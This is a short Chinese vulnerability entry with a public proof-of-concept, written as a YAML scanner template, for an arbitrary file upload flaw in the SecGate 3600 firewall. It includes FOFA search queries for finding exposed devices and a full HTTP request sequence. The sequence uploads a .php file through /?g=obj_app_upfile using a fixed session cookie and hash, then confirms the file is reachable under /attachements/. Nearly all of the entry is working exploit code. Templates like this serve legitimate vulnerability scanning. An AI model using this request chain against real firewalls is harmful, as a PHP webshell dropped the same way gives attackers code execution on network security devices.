漏洞描述
fofa: title="网神SecGate 3600防火墙"
fofa: fid="1Lh1LHi6yfkhiO83I59AYg=="
secgate-3600-obj-app-upfile-fileupload: 网神SecGate 3600防火墙index任意文件上传
PoC代码[已公开]
id: secgate-3600-obj-app-upfile-fileupload
info:
name: 网神SecGate 3600防火墙index任意文件上传
author: zan8in
severity: critical
verified: true
description: |-
fofa: title="网神SecGate 3600防火墙"
fofa: fid="1Lh1LHi6yfkhiO83I59AYg=="
tags: secgate,fileupload
created: 2024/09/24
set:
randstr: randomLowercase(6)
rboundary: randomLowercase(8)
rbody: randomLowercase(32)
rules:
r0:
request:
method: POST
path: /?g=obj_app_upfile
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
Cookie: __s_sessionid__=lgltbghaugdq7099bftei3egh7
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\
\r\n\
10000000\r\n\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"upfile\"; filename=\"{{randstr}}.php\"\r\n\
Content-Type: text/plain\r\n\
\r\n\
{{rbody}}\r\n\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"submit_post\"\r\n\
\r\n\
obj_app_upfile\r\n\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"__hash__\"\r\n\
\r\n\
0b9d6b1ab7479ab69d9f71b05e0e9445\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.status == 302 # && response.body.bcontains(b'windows.locadtion=')
r1:
request:
method: GET
path: /attachements/{{randstr}}.php
expression: response.status == 200 && response.body.bcontains(bytes(rbody))
expression: r0() && r1()